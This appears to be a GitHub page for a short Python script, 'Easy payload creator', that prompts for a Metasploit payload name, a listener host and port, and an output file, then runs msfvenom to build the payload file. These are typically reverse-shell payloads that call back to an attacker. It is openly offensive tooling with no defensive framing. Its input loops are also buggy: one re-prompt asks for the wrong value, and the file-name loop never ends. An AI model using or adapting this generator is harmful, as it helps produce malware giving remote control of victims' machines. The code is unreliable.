-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathEasy payload creator.py
53 lines (38 loc) · 1.35 KB
/
Easy payload creator.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
print("""
-------------------------------------------------
| Welcome To Payload Creator |
| |
| Red_foxy |
| |
-------------------------------------------------
""")
import subprocess
payload = input("Enter Payload:")
while payload == "":
print("Enter Something")
payload = input("Enter Payload:")
lhost = input("Enter LHOST:")
while lhost == "":
print("Enter Something")
lhost = input("Enter LPORT:")
lport = input("Enter LPORT:")
while lport == "":
print("Enter Something")
lport = input("Enter LPORT:")
outfor = input("Enter File Name With Extension:")
while outfor == "":
print("Enter Something")
payload = input("Enter File Name With Extension:")
print("""----------------------------------------------------------------------------
""")
print(""" Your... Payload Was Creating........ Wait......
""")
print("""----------------------------------------------------------------------------
""")
subprocess.call(["msfvenom","-p",payload,"LHOST=" + lhost,"LPORT=" + lport,"-o",outfor])
print("""----------------------------------------------------------------------------
""")
print(""" ##### SUCESSFULLY CREATED #####
""")
print("""----------------------------------------------------------------------------
""")